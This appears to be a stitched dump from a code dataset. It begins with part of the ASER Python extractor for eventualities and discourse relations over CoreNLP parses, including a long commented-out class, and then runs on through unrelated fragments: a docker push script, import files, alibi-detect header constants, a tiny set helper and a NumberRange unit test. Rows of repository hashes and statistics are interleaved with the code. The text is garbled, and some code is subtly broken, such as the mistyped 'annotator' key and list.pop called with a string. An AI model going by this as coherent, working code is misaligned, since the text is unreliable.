[(7d9ea9023b66a0ebc167f0dbb6ea8cd75d7b46f9, 25edad6781577dcb3ba715c8230416fb0d4c45c4, {'Co_Occurrence': 1.0})],
[(8540897b645962964fd644242d4cc0032f024e86, 25edad6781577dcb3ba715c8230416fb0d4c45c4, {'Synchronous': 1.0})]])
"""
if eventuality_output_format not in ["Eventuality", "json"]:
raise NotImplementedError("Error: extract_eventualities only supports Eventuality or json.")
if relation_output_format not in ["Relation", "triplet"]:
raise NotImplementedError("Error: extract_relations only supports Relation or triplet.")
if not isinstance(parsed_result, (list, tuple, dict)):
raise NotImplementedError
if isinstance(parsed_result, dict):
is_single_sent = True
parsed_result = [parsed_result]
else:
is_single_sent = False
para_eventualities = self.extract_eventualities_from_parsed_result(
parsed_result, output_format="Eventuality", in_order=True, **kw
)
para_relations = self.extract_relations_from_parsed_result(
parsed_result, para_eventualities, output_format="Relation", in_order=True, **kw
)
if in_order:
if eventuality_output_format == "json":
para_eventualities = [[eventuality.encode(encoding=None) for eventuality in sent_eventualities] \
for sent_eventualities in para_eventualities]
if relation_output_format == "triplet":
para_relations = [list(chain.from_iterable([relation.to_triplet() for relation in sent_relations])) \
for sent_relations in para_relations]
if is_single_sent:
return para_eventualities[0], para_relations[0]
else:
return para_eventualities, para_relations
else:
eid2eventuality = dict()
for eventuality in chain.from_iterable(para_eventualities):
eid = eventuality.eid
if eid not in eid2eventuality:
eid2eventuality[eid] = deepcopy(eventuality)
else:
eid2eventuality[eid].update(eventuality)
if eventuality_output_format == "Eventuality":
eventualities = sorted(eid2eventuality.values(), key=lambda e: e.eid)
elif eventuality_output_format == "json":
eventualities = sorted(
[eventuality.encode(encoding=None) for eventuality in eid2eventuality.values()],
key=lambda e: e["eid"]
)
rid2relation = dict()
for relation in chain.from_iterable(para_relations):
if relation.rid not in rid2relation:
rid2relation[relation.rid] = deepcopy(relation)
else:
rid2relation[relation.rid].update(relation)
if relation_output_format == "Relation":
para_relations = sorted(rid2relation.values(), key=lambda r: r.rid)
elif relation_output_format == "triplet":
para_relations = sorted(chain.from_iterable([relation.to_triplets() for relation in rid2relation.values()]))
return eventualities, para_relations
def extract_from_text(
self,
text,
eventuality_output_format="Eventuality",
relation_output_format="Relation",
in_order=True,
annotators=None,
**kw
):
""" Extract both eventualities and relations from a raw text
:param text: a raw text
:type text: str
:param eventuality_output_format: which format to return eventualities, "Eventuality" or "json"
:type eventuality_output_format: str (default = "Eventuality")
:param relation_output_format: which format to return relations, "Relation" or "triplet"
:type relation_output_format: str (default = "Relation")
:param in_order: whether the returned order follows the input token order
:type in_order: bool (default = True)
:param annotators: annotators for corenlp, please refer to https://stanfordnlp.github.io/CoreNLP/annotators.html
:type annotators: Union[List, None] (default = None)
:param kw: other parameters
:type kw: Dict[str, object]
:return: the extracted eventualities and relations
:rtype: :rtype: Tuple[Union[List[List[aser.eventuality.Eventuality]], List[List[Dict[str, object]]], List[aser.eventuality.Eventuality], List[Dict[str, object]]], Union[List[List[aser.relation.Relation]], List[List[Dict[str, object]]], List[aser.relation.Relation], List[Dict[str, object]]]]
.. highlight:: python
.. code-block:: python
Input:
"My army will find your boat. In the meantime, I'm sure we could find you suitable accommodations."
Output:
([[my army will find you boat],
[i be sure, we could find you suitable accommodation]],
[[],
[(7d9ea9023b66a0ebc167f0dbb6ea8cd75d7b46f9, 25edad6781577dcb3ba715c8230416fb0d4c45c4, {'Co_Occurrence': 1.0})],
[(8540897b645962964fd644242d4cc0032f024e86, 25edad6781577dcb3ba715c8230416fb0d4c45c4, {'Synchronous': 1.0})]])
"""
if eventuality_output_format not in ["Eventuality", "json"]:
raise NotImplementedError("Error: extract_eventualities only supports Eventuality or json.")
if relation_output_format not in ["Relation", "triplet"]:
raise NotImplementedError("Error: extract_relations only supports Relation or triplet.")
parsed_result = self.parse_text(text, annotators=annotators)
return self.extract_from_parsed_result(
parsed_result,
eventuality_output_format=eventuality_output_format,
relation_output_format=relation_output_format,
in_order=in_order,
**kw
)
class SeedRuleASERExtractor(BaseASERExtractor):
""" ASER Extractor based on rules to extract both eventualities and relations (for ASER v1.0)
"""
def __init__(self, corenlp_path="", corenlp_port=0, **kw):
if "annotators" not in kw:
kw["annotators"] = list(ANNOTATORS)
if "parse" in kw["annotators"]:
kw["annotators"].pop("parse")
if "depparse" not in kw["annotators"]:
kw["annotator"].append("depparse")
super().__init__(corenlp_path, corenlp_port, **kw)
from .rule import CLAUSE_WORDS
self.eventuality_extractor = SeedRuleEventualityExtractor(
corenlp_path=self.corenlp_path, corenlp_port=self.corenlp_port, skip_words=CLAUSE_WORDS, **kw
)
self.relation_extractor = SeedRuleRelationExtractor(**kw)
class DiscourseASERExtractor(BaseASERExtractor):
""" ASER Extractor based on discourse parsing to extract both eventualities and relations (for ASER v2.0)
"""
def __init__(self, corenlp_path="", corenlp_port=0, **kw):
if "annotators" not in kw:
kw["annotators"] = list(ANNOTATORS)
if "depparse" in kw["annotators"]:
kw["annotator"].pop("depparse")
if "parse" not in kw["annotators"]:
kw["annotators"].append("parse")
super().__init__(corenlp_path, corenlp_port, **kw)
self.eventuality_extractor = DiscourseEventualityExtractor(
corenlp_path=self.corenlp_path, corenlp_port=self.corenlp_port, **kw
)
self.relation_extractor = DiscourseRelationExtractor(**kw)
def extract_from_parsed_result(
self,
parsed_result,
eventuality_output_format="Eventuality",
relation_output_format="Relation",
in_order=True,
**kw
):
""" Extract both eventualities and relations from a parsed result
:param parsed_result: the parsed result returned by corenlp
:type parsed_result: List[Dict[str, object]]
:param eventuality_output_format: which format to return eventualities, "Eventuality" or "json"
:type eventuality_output_format: str (default = "Eventuality")
:param relation_output_format: which format to return relations, "Relation" or "triplet"
:type relation_output_format: str (default = "Relation")
:param in_order: whether the returned order follows the input token order
:type in_order: bool (default = True)
:param kw: other parameters (e.g., syntax_tree_cache)
:type kw: Dict[str, object]
:return: the extracted eventualities and relations
:rtype: :rtype: Tuple[Union[List[List[aser.eventuality.Eventuality]], List[List[Dict[str, object]]], List[aser.eventuality.Eventuality], List[Dict[str, object]]], Union[List[List[aser.relation.Relation]], List[List[Dict[str, object]]], List[aser.relation.Relation], List[Dict[str, object]]]]
"""
if "syntax_tree_cache" not in kw:
kw["syntax_tree_cache"] = dict()
return super().extract_from_parsed_result(
parsed_result,
eventuality_output_format=eventuality_output_format,
relation_output_format=relation_output_format,
in_order=in_order,
**kw
)
# The following extractor can cover more eventualities but the semantic meaning may be incomplete.
# class DiscourseASERExtractor(BaseASERExtractor):
# def __init__(self, corenlp_path="", corenlp_port=0, **kw):
# super().__init__(corenlp_path, corenlp_port, **kw)
# self.eventuality_extractor = SeedRuleEventualityExtractor(**kw)
# self.conn_extractor = ConnectiveExtractor(**kw)
# self.argpos_classifier = ArgumentPositionClassifier(**kw)
# self.ss_extractor = SSArgumentExtractor(**kw)
# self.ps_extractor = PSArgumentExtractor(**kw)
# self.explicit_classifier = ExplicitSenseClassifier(**kw)
# def _extract_eventualities_from_clause(self, sent_parsed_result, clause):
# len_clause = len(clause)
# idx_mapping = {j: i for i, j in enumerate(clause)}
# indices_set = set(clause)
# clause_parsed_result = {
# "text": "",
# "dependencies": [(idx_mapping[dep[0]], dep[1], idx_mapping[dep[2]]) for dep in sent_parsed_result["dependencies"] \
# if dep[0] in indices_set and dep[2] in indices_set],
# "tokens": [sent_parsed_result["tokens"][idx] for idx in clause],
# "pos_tags": [sent_parsed_result["pos_tags"][idx] for idx in clause],
# "lemmas": [sent_parsed_result["lemmas"][idx] for idx in clause]}
# if "ners" in sent_parsed_result:
# clause_parsed_result["ners"] = [sent_parsed_result["ners"][idx] for idx in clause]
# if "mentions" in sent_parsed_result:
# clause_parsed_result["mentions"] = list()
# for mention in sent_parsed_result["mentions"]:
# start_idx = bisect.bisect_left(clause, mention["start"])
# if not (start_idx < len_clause and clause[start_idx] == mention["start"]):
# continue
# end_idx = bisect.bisect_left(clause, mention["end"]-1)
# if not (end_idx < len_clause and clause[end_idx] == mention["end"]-1):
# continue
# mention = copy(mention)
# mention["start"] = start_idx
# mention["end"] = end_idx+1
# clause_parsed_result["mentions"].append(mention)
# eventualities = self.eventuality_extractor.extract_from_parsed_result(
# clause_parsed_result, output_format="Eventuality", in_order=True)
# for eventuality in eventualities:
# for k, v in eventuality.raw_sent_mapping.items():
# eventuality.raw_sent_mapping[k] = clause[v]
# eventuality.eid = Eventuality.generate_eid(eventuality)
# return eventualities
# def _append_new_eventuaities_to_list(self, existed_eventualities, new_eventualities):
# len_existed_eventualities = len(existed_eventualities)
# for new_e in new_eventualities:
# is_existed = False
# for old_idx in range(len_existed_eventualities):
# old_e = existed_eventualities[old_idx]
# if old_e.eid == new_e.eid and old_e.raw_sent_mapping == new_e.raw_sent_mapping:
# is_existed = True
# break
# if not is_existed:
# existed_eventualities.append(new_e)
# def extract_eventualities_from_parsed_result(self, parsed_result,
# output_format="Eventuality", in_order=True, **kw):
# if output_format not in ["Eventuality", "json"]:
# raise NotImplementedError("Error: extract_from_parsed_result only supports Eventuality or json.")
# if not isinstance(parsed_result, (list, tuple, dict)):
# raise NotImplementedError
# if isinstance(parsed_result, dict):
# is_single_sent = True
# parsed_result = [parsed_result]
# else:
# is_single_sent = False
# syntax_tree_cache = kw.get("syntax_tree_cache", dict())
# para_eventualities = [list() for _ in range(len(parsed_result))]
# para_clauses = self._extract_clauses(parsed_result, syntax_tree_cache)
# for sent_parsed_result, sent_clauses, sent_eventualities in zip(parsed_result, para_clauses, para_eventualities):
# for clause in sent_clauses:
# sent_eventualities.extend(self._extract_eventualities_from_clause(sent_parsed_result, clause))
# if in_order:
# if output_format == "json":
# para_eventualities = [[eventuality.encode(encoding=None) for eventuality in sent_eventualities] \
# for sent_eventualities in para_eventualities]
# if is_single_sent:
# return para_eventualities[0]
# else:
# return para_eventualities
# else:
# eid2eventuality = dict()
# for eventuality in chain.from_iterable(para_eventualities):
# eid = eventuality.eid
# if eid not in eid2eventuality:
# eid2eventuality[eid] = deepcopy(eventuality)
# else:
# eid2eventuality[eid].update(eventuality)
# if output_format == "Eventuality":
# eventualities = sorted(eid2eventuality.values(), key=lambda e: e.eid)
# elif output_format == "json":
# eventualities = sorted([eventuality.encode(encoding=None) for eventuality in eid2eventuality.values()], key=lambda e: e["eid"])
# return eventualities
# def extract_relations_from_parsed_result(self, parsed_result, para_eventualities,
# output_format="Relation",
# in_order=True, **kw):
# if output_format not in ["Relation", "triplet"]:
# raise NotImplementedError("Error: extract_relations_from_parsed_result only supports Relation or triplet.")
# len_sentences = len(parsed_result)
# if len_sentences == 0:
# if in_order:
# return [list()]
# else:
# return list()
# similarity = kw.get("similarity", "simpson").lower()
# threshold = kw.get("threshold", 0.8)
# if threshold < 0.0 or threshold > 1.0:
# raise ValueError("Error: threshold should be between 0.0 and 1.0.")
# if similarity == "simpson":
# similarity_func = self._match_argument_eventuality_by_Simpson
# elif similarity == "jaccard":
# similarity_func = self._match_argument_eventuality_by_Jaccard
# elif similarity == "discourse":
# similarity_func = self._match_argument_eventuality_by_dependencies
# else:
# raise NotImplementedError("Error: extract_from_parsed_result only supports Simpson or Jaccard.")
# syntax_tree_cache = kw.get("syntax_tree_cache", dict())
# para_relations = [list() for _ in range(2*len_sentences-1)]
# # replace sentences that contains no eventuality with empty sentences
# filtered_parsed_result = list()
# for sent_idx, (sent_parsed_result, sent_eventualities) in enumerate(zip(parsed_result, para_eventualities)):
# if len(sent_eventualities) > 0:
# relations_in_sent = para_relations[sent_idx]
# for e1_idx in range(len(sent_eventualities)-1):
# heid = sent_eventualities[e1_idx].eid
# for e2_idx in range(e1_idx+1, len(sent_eventualities)):
# teid = sent_eventualities[e2_idx].eid
# relations_in_sent.append(Relation(heid, teid, ["Co_Occurrence"]))
# filtered_parsed_result.append(sent_parsed_result)
# else:
# filtered_parsed_result.append(EMPTY_SENT_PARSED_RESULT) # empty sentence
# # filtered_parsed_result.append(sent_parsed_result)
# connectives = self.conn_extractor.extract(filtered_parsed_result, syntax_tree_cache)
# SS_connectives, PS_connectives = self.argpos_classifier.classify(filtered_parsed_result, connectives, syntax_tree_cache)
# SS_connectives = self.ss_extractor.extract(filtered_parsed_result, SS_connectives, syntax_tree_cache)
# PS_connectives = self.ps_extractor.extract(filtered_parsed_result, PS_connectives, syntax_tree_cache)
# connectives = self.explicit_classifier.classify(filtered_parsed_result, SS_connectives+PS_connectives, syntax_tree_cache)
# connectives.sort(key=lambda x: (x["sent_idx"], x["indices"][0] if len(x["indices"]) > 0 else -1))
# for connective in connectives:
# conn_indices = connective.get("indices", None)
# arg1 = connective.get("arg1", None)
# arg2 = connective.get("arg2", None)
# sense = connective.get("sense", None)
# if conn_indices and arg1 and arg2 and (sense and sense != "None"):
# arg1_sent_idx = arg1["sent_idx"]
# arg2_sent_idx = arg2["sent_idx"]
# relation_list_idx = arg1_sent_idx if arg1_sent_idx == arg2_sent_idx else arg1_sent_idx + len_sentences
# relations = para_relations[relation_list_idx]
# sent_parsed_result1, sent_eventualities1 = parsed_result[arg1_sent_idx], para_eventualities[arg1_sent_idx]
# sent_parsed_result2, sent_eventualities2 = parsed_result[arg2_sent_idx], para_eventualities[arg2_sent_idx]
# arg1_eventualities = [e for e in sent_eventualities1 if \
# similarity_func(sent_parsed_result1, arg1, e, threshold=threshold, conn_indices=conn_indices)]
# arg2_eventualities = [e for e in sent_eventualities2 if \
# similarity_func(sent_parsed_result2, arg2, e, threshold=threshold, conn_indices=conn_indices)]
# cnt = 0.0
# if len(arg1_eventualities) > 0 and len(arg2_eventualities) > 0:
# cnt = 1.0 / (len(arg1_eventualities) * len(arg2_eventualities))
# for e1 in arg1_eventualities:
# heid = e1.eid
# for e2 in arg2_eventualities:
# teid = e2.eid
# existed_relation = False
# for relation in relations:
# if relation.hid == heid and relation.tid == teid:
# relation.update({sense: cnt})
# existed_relation = True
# break
# if not existed_relation:
# relations.append(Relation(heid, teid, {sense: cnt}))
# if in_order:
# if output_format == "Relation":
# return para_relations
# elif output_format == "triplet":
# return [sorted(chain.from_iterable([r.to_triplets() for r in relations])) \
# for relations in para_relations]
# else:
# if output_format == "Relation":
# rid2relation = dict()
# for relation in chain(*para_relations):
# if relation.rid not in rid2relation:
# rid2relation[relation.rid] = deepcopy(relation)
# else:
# rid2relation[relation.rid].update(relation)
# return sorted(rid2relation.values(), key=lambda r: r.rid)
# if output_format == "triplet":
# return sorted([r.to_triplets() for relations in para_relations for r in relations])
# def extract_from_parsed_result(self, parsed_result,
# eventuality_output_format="Eventuality",
# relation_output_format="Relation",
# in_order=True, **kw):
# if eventuality_output_format not in ["Eventuality", "json"]:
# raise NotImplementedError("Error: extract_eventualities only supports Eventuality or json.")
# if relation_output_format not in ["Relation", "triplet"]:
# raise NotImplementedError("Error: extract_relations only supports Relation or triplet.")
# if not isinstance(parsed_result, (list, tuple, dict)):
# raise NotImplementedError
# if isinstance(parsed_result, dict):
# is_single_sent = True
# parsed_result = [parsed_result]
# else:
# is_single_sent = False
# syntax_tree_cache = kw.get("syntax_tree_cache", dict())
# len_sentences = len(parsed_result)
# para_eventualities = [list() for _ in range(len_sentences)]
# para_relations = [list() for _ in range(2*len_sentences-1)]
# connectives = self.conn_extractor.extract(parsed_result, syntax_tree_cache)
# SS_connectives, PS_connectives = self.argpos_classifier.classify(parsed_result, connectives, syntax_tree_cache)
# SS_connectives = self.ss_extractor.extract(parsed_result, SS_connectives, syntax_tree_cache)
# PS_connectives = self.ps_extractor.extract(parsed_result, PS_connectives, syntax_tree_cache)
# connectives = self.explicit_classifier.classify(parsed_result, SS_connectives+PS_connectives, syntax_tree_cache)
# connectives.sort(key=lambda x: (x["sent_idx"], x["indices"][0] if len(x["indices"]) > 0 else -1))
# for connective in connectives:
# conn_indices = connective.get("indices", None)
# arg1 = connective.get("arg1", None)
# arg2 = connective.get("arg2", None)
# sense = connective.get("sense", None)
# if conn_indices and arg1 and arg2:
# arg1_sent_idx = arg1["sent_idx"]
# arg2_sent_idx = arg2["sent_idx"]
# senses = []
# if arg1_sent_idx == arg2_sent_idx:
# senses.append("Co_Occurrence")
# if sense and sense != "None":
# senses.append(sense)
# if len(senses) == 0:
# continue
# relation_list_idx = arg1_sent_idx if arg1_sent_idx == arg2_sent_idx else arg1_sent_idx + len_sentences
# relations = para_relations[relation_list_idx]
# sent_parsed_result1, sent_eventualities1 = parsed_result[arg1_sent_idx], para_eventualities[arg1_sent_idx]
# sent_parsed_result2, sent_eventualities2 = parsed_result[arg2_sent_idx], para_eventualities[arg2_sent_idx]
# arg1_eventualities = self._extract_eventualities_from_clause(sent_parsed_result1, arg1["indices"])
# arg2_eventualities = self._extract_eventualities_from_clause(sent_parsed_result2, arg2["indices"])
# self._append_new_eventuaities_to_list(sent_eventualities1, arg1_eventualities)
# self._append_new_eventuaities_to_list(sent_eventualities2, arg2_eventualities)
# cnt = 0.0
# if len(arg1_eventualities) > 0 and len(arg2_eventualities) > 0:
# cnt = 1.0 / (len(arg1_eventualities) * len(arg2_eventualities))
# for e1 in arg1_eventualities:
# heid = e1.eid
# for e2 in arg2_eventualities:
# teid = e2.eid
# is_existed = False
# for relation in relations:
# if relation.hid == heid and relation.tid == teid:
# relation.update({sense: cnt for sense in senses})
# is_existed = True
# break
# if not is_existed:
# relations.append(Relation(heid, teid, {sense: cnt for sense in senses}))
# if in_order:
# if eventuality_output_format == "json":
# para_eventualities = [[eventuality.encode(encoding=None) for eventuality in sent_eventualities] \
# for sent_eventualities in para_eventualities]
# if relation_output_format == "triplet":
# relations = [list(chain.from_iterable([relation.to_triplet() for relation in sent_relations])) \
# for sent_relations in para_relations]
# if is_single_sent:
# return para_eventualities[0], para_relations[0]
# else:
# return para_eventualities, para_relations
# else:
# eid2eventuality = dict()
# for eventuality in chain.from_iterable(para_eventualities):
# eid = eventuality.eid
# if eid not in eid2eventuality:
# eid2eventuality[eid] = deepcopy(eventuality)
# else:
# eid2eventuality[eid].update(eventuality)
# if eventuality_output_format == "Eventuality":
# eventualities = sorted(eid2eventuality.values(), key=lambda e: e.eid)
# elif eventuality_output_format == "json":
# eventualities = sorted([eventuality.encode(encoding=None) for eventuality in eid2eventuality.values()], key=lambda e: e["eid"])
# rid2relation = dict()
# for relation in chain.from_iterable(para_relations):
# if relation.rid not in rid2relation:
# rid2relation[relation.rid] = deepcopy(relation)
# else:
# rid2relation[relation.rid].update(relation)
# if relation_output_format == "Relation":
# relations = sorted(rid2relation.values(), key=lambda r: r.rid)
# elif relation_output_format == "triplet":
# relations = sorted(chain.from_iterable([relation.to_triplets() for relation in rid2relation.values()]))
# return eventualities, relations
# def _extract_clauses(self, parsed_result, syntax_tree_cache):
# para_arguments = [set() for _ in range(len(parsed_result))]
# connectives = self.conn_extractor.extract(parsed_result, syntax_tree_cache)
# para_connectives = [set() for _ in range(len(parsed_result))]
# for connective in connectives:
# sent_idx, indices = connective["sent_idx"], tuple(connective["indices"])
# para_connectives[sent_idx].add(indices)
# for sent_idx, sent_parsed_result in enumerate(parsed_result):
# sent_connectives = para_connectives[sent_idx]
# sent_arguments = para_arguments[sent_idx]
# if sent_idx in syntax_tree_cache:
# syntax_tree = syntax_tree_cache[sent_idx]
# else:
# syntax_tree = syntax_tree_cache[sent_idx] = SyntaxTree(sent_parsed_result["parse"])
# # more but slower
# # for indices in powerset(sent_connectives):
# # indices = set(chain.from_iterable(indices))
# # sent_arguments.update(get_clauses(sent_parsed_result, syntax_tree, sep_indices=indices))
# sent_arguments.update(get_clauses(sent_parsed_result, syntax_tree, sep_indices=set(chain.from_iterable(sent_connectives))))
# return para_arguments
| 49.217467
| 300
| 0.497569
| 5,214
| 56,354
| 5.185079
| 0.061373
| 0.055484
| 0.007546
| 0.008877
| 0.810246
| 0.780692
| 0.764232
| 0.7285
| 0.711004
| 0.701498
| 0
| 0.023124
| 0.393761
| 56,354
| 1,144
| 301
| 49.26049
| 0.768206
| 0.71601
| 0
| 0.347368
| 0
| 0
| 0.100933
| 0.017114
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068421
| false
| 0
| 0.036842
| 0
| 0.173684
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
463308980a2e67fc68c91f6ea9ec29d55318c067
| 63
|
py
|
Python
|
docker/runner/node/0.10.37/push.py
|
urodoz/sailfish-runner
|
1b33da8be335c0bf1e235a50ad36f60f95521bfc
|
[
"MIT"
] | null | null | null |
docker/runner/node/0.10.37/push.py
|
urodoz/sailfish-runner
|
1b33da8be335c0bf1e235a50ad36f60f95521bfc
|
[
"MIT"
] | null | null | null |
docker/runner/node/0.10.37/push.py
|
urodoz/sailfish-runner
|
1b33da8be335c0bf1e235a50ad36f60f95521bfc
|
[
"MIT"
] | null | null | null |
import os
os.system("docker push urodoz/sailfish-node:0.10.37")
| 31.5
| 53
| 0.777778
| 12
| 63
| 4.083333
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.084746
| 0.063492
| 63
| 2
| 53
| 31.5
| 0.745763
| 0
| 0
| 0
| 0
| 0
| 0.625
| 0.4375
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
466cded2ac47079ec29747cfce95b64a10996154
| 67
|
py
|
Python
|
feature_extraction/__init__.py
|
drakipovic/Bee
|
0e89a608fdeaad9594a09e93ed871c40008b7562
|
[
"MIT"
] | null | null | null |
feature_extraction/__init__.py
|
drakipovic/Bee
|
0e89a608fdeaad9594a09e93ed871c40008b7562
|
[
"MIT"
] | null | null | null |
feature_extraction/__init__.py
|
drakipovic/Bee
|
0e89a608fdeaad9594a09e93ed871c40008b7562
|
[
"MIT"
] | null | null | null |
from feature_extractor import FeatureExtractor, CppFeatureExtractor
| 67
| 67
| 0.925373
| 6
| 67
| 10.166667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.059701
| 67
| 1
| 67
| 67
| 0.968254
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
46948f30f2ac0aac2b98a3292f0400a4ee918bee
| 184
|
py
|
Python
|
components/alibi-detect-server/adserver/constants.py
|
glindsell/seldon-core
|
a6992832b74ed71bbd3a91c48b5a79a5cee785b2
|
[
"Apache-2.0"
] | 1
|
2020-07-14T15:42:41.000Z
|
2020-07-14T15:42:41.000Z
|
components/alibi-detect-server/adserver/constants.py
|
glindsell/seldon-core
|
a6992832b74ed71bbd3a91c48b5a79a5cee785b2
|
[
"Apache-2.0"
] | 231
|
2020-08-10T08:38:42.000Z
|
2021-08-02T20:56:49.000Z
|
components/alibi-detect-server/adserver/constants.py
|
josephglanville/seldon-core
|
34ab0c33c55879ebe3ea3009ca64b0b47d18896c
|
[
"Apache-2.0"
] | null | null | null |
HEADER_RETURN_INSTANCE_SCORE = "Alibi-Detect-Return-Instance-Score"
HEADER_RETURN_FEATURE_SCORE = "Alibi-Detect-Return-Feature-Score"
HEADER_OUTLIER_TYPE = "Alibi-Detect-Outlier-Type"
| 46
| 67
| 0.842391
| 25
| 184
| 5.88
| 0.36
| 0.22449
| 0.258503
| 0.29932
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.048913
| 184
| 3
| 68
| 61.333333
| 0.84
| 0
| 0
| 0
| 0
| 0
| 0.5
| 0.5
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
d3b44a61b76b201fa497bfe2338de4744d1d6868
| 63
|
py
|
Python
|
src/stk/ea/crossover/__init__.py
|
stevenbennett96/stk
|
6e5af87625b83e0bfc7243bc42d8c7a860cbeb76
|
[
"MIT"
] | 21
|
2018-04-12T16:25:24.000Z
|
2022-02-14T23:05:43.000Z
|
src/stk/ea/crossover/__init__.py
|
stevenbennett96/stk
|
6e5af87625b83e0bfc7243bc42d8c7a860cbeb76
|
[
"MIT"
] | 8
|
2019-03-19T12:36:36.000Z
|
2020-11-11T12:46:00.000Z
|
src/stk/ea/crossover/__init__.py
|
stevenbennett96/stk
|
6e5af87625b83e0bfc7243bc42d8c7a860cbeb76
|
[
"MIT"
] | 5
|
2018-08-07T13:00:16.000Z
|
2021-11-01T00:55:10.000Z
|
from .crossers import * # noqa
from .records import * # noqa
| 21
| 31
| 0.68254
| 8
| 63
| 5.375
| 0.625
| 0.465116
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.222222
| 63
| 2
| 32
| 31.5
| 0.877551
| 0.142857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d3bc83d947706d2d0590301ff140b0f4a38a64fe
| 45
|
py
|
Python
|
list_to_set.py
|
rivcah/100daysofPython
|
9536f687000008bb11d14e7f1607f2c438e77dca
|
[
"Unlicense"
] | null | null | null |
list_to_set.py
|
rivcah/100daysofPython
|
9536f687000008bb11d14e7f1607f2c438e77dca
|
[
"Unlicense"
] | null | null | null |
list_to_set.py
|
rivcah/100daysofPython
|
9536f687000008bb11d14e7f1607f2c438e77dca
|
[
"Unlicense"
] | null | null | null |
def setup_set(items):
return(set(items))
| 15
| 22
| 0.688889
| 7
| 45
| 4.285714
| 0.714286
| 0.533333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.155556
| 45
| 2
| 23
| 22.5
| 0.789474
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 0.5
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 6
|
31134eb7a34d5f2d500a9544df5b0d19258e6496
| 20,350
|
py
|
Python
|
tests/app/validation/test_number_range_validator.py
|
nealedj/eq-survey-runner
|
b8e6cddae6068f6c8fd60e21d31d58aaa79bbb34
|
[
"MIT"
] | null | null | null |
tests/app/validation/test_number_range_validator.py
|
nealedj/eq-survey-runner
|
b8e6cddae6068f6c8fd60e21d31d58aaa79bbb34
|
[
"MIT"
] | 1
|
2018-11-05T12:00:51.000Z
|
2018-11-05T12:00:51.000Z
|
tests/app/validation/test_number_range_validator.py
|
nealedj/eq-survey-runner
|
b8e6cddae6068f6c8fd60e21d31d58aaa79bbb34
|
[
"MIT"
] | null | null | null |
import unittest
from unittest.mock import Mock, patch
from wtforms.validators import ValidationError
from app.jinja_filters import format_number
from app.validation.error_messages import error_messages
from app.validation.validators import NumberRange
from app.forms.fields import get_number_field, CustomIntegerField
from app.data_model.answer_store import Answer, AnswerStore
# pylint: disable=no-member
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
class TestNumberRangeValidator(unittest.TestCase):
"""
Number range validator uses the data, which is already known as integer
"""
def setUp(self):
self.store = AnswerStore()
answer1 = Answer(
answer_id='set-minimum',
answer_instance=1,
group_instance=1,
value=10,
)
answer2 = Answer(
answer_id='set-maximum',
answer_instance=1,
group_instance=1,
value=20,
)
answer3 = Answer(
answer_id='set-maximum-cat',
answer_instance=1,
group_instance=1,
value='cat',
)
self.store.add(answer1)
self.store.add(answer2)
self.store.add(answer3)
def tearDown(self):
self.store.clear()
def test_too_small_when_min_set_is_invalid(self):
validator = NumberRange(minimum=0)
mock_form = Mock()
mock_field = Mock()
mock_field.data = -10
with self.assertRaises(ValidationError) as ite:
validator(mock_form, mock_field)
self.assertEqual(error_messages['NUMBER_TOO_SMALL'] % dict(min=0), str(ite.exception))
def test_too_big_when_max_set_is_invalid(self):
validator = NumberRange(maximum=9999999999)
mock_form = Mock()
mock_field = Mock()
mock_field.data = 10000000000
with self.assertRaises(ValidationError) as ite:
validator(mock_form, mock_field)
